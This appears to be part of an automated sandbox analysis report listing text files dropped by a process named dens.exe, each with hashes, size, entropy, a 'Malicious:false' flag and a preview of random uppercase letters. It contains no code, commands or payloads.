                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                            MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                            SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                            SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                            SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.697336881644685
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                                                                                                                                                                            MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                                                                                                                                                                            SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                                                                                                                                                                            SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                                                                                                                                                                            SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:WKXEWIOTXIKPVKMTOJVZKCCJOJQJVVBUCRVSCWBTZFRFCLMJEFYWDAADXDSWAVKQUKEQVBGBEVVYQQKRCSDIQBFHQPNUHXEGBVBQAZXUXMBFNLNCNTBFAMVYZJITBIGADWSFAFETGWVSLSMWHTRSSUNGFAPUBMTUYBFNDIWUKESLBWQSCOTLFFHGDQBTCYHJBCBOARQTWMUDRIUXIXOCLDIEADCRMXGAMQGVIRNLAGTALJHBZWRNXXRRBLYDOAYCBGEJCTGYVJXPIAIVUAKQQBRSXZKMFBMWWCHMTGNMNRBVSOTUFWOEJRLHHVPMJECGASFUTKIEPJVDDGJBEAOSKQSOAKQFVDMPVFZXVQQGBIVNAKYSEGLMWLAYDYTALUJSLPWCLEJKQBXBYHAKPFMJEIYHGDOFGQSDOCEQICJNJHPIMYZXEEBLQDGZQJHXKMNXDWJCMMFBONBYYWLDOKPYOROQOAOXKLNFZNGOBDFJUKRZTHKLRBINVCYAUIXORJECNOHLVMBHPPCTEWZMHAKKOWVWNWGYCHRMUWRNDXFYYWTIGTCJKQDPGUNHAJQDLUZMXHCGTFUQBMGYHZZQTDVDXANXWNWKFTJJGQDHQOXVXPQVSIEKEEJXYUACENKWKIJBJQXHMLMPZXYAVPNORKZSDXAKFPVLVKXAALPKPLPVFPCSRBEEJDNJCIJXXOCNXCBVGHIYCQQVQHTTNURHGTJJXKJRPJEGOUFOHMMCJGVNMXOAXZBVGWVBLQZNFUTGTNMFHQOEJPQLIMHIWPQHWMJJDCVVMWJEEFQQZJEEECMHCCUANTBJYRWUCSJSOHYMSBWTKOKBZPVNMIVCLDDALCEUFSLAOCOCSAXADDYPCSIANHKQFGMSMYTDVKAOIYTWPDDCRKDNZYGXHYDSDFXTLUDKREZTPVBCYOHCUNIFNCKBSSGTENGDYROMJUTSSFWEEFXLJPBMSINKXZCEUWQMDWGNHDWNFHYTECVIYIAPNGWL
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695860210921229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                                                                                                                                                                                                            MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                                                                                                                                                                                                            SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                                                                                                                                                                                                            SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                                                                                                                                                                                                            SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                            MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                            SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                            SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                            SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                            MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                            SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                            SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                            SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                            Malicious:false
